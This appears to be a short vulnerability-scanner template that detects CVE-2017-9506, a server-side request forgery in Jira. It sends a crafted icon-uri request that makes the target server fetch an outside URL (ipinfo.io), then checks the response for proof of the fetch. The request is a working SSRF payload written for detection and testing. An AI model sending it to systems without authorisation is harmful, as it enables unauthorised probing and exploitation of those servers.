id: CVE-2017-9506

info:
  name: Jira IconURIServlet SSRF
  author: Ice3man
  severity: high

requests:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json"
    matchers:
      - type: word
        words:
          - "ipinfo.io/missingauth"
        part: body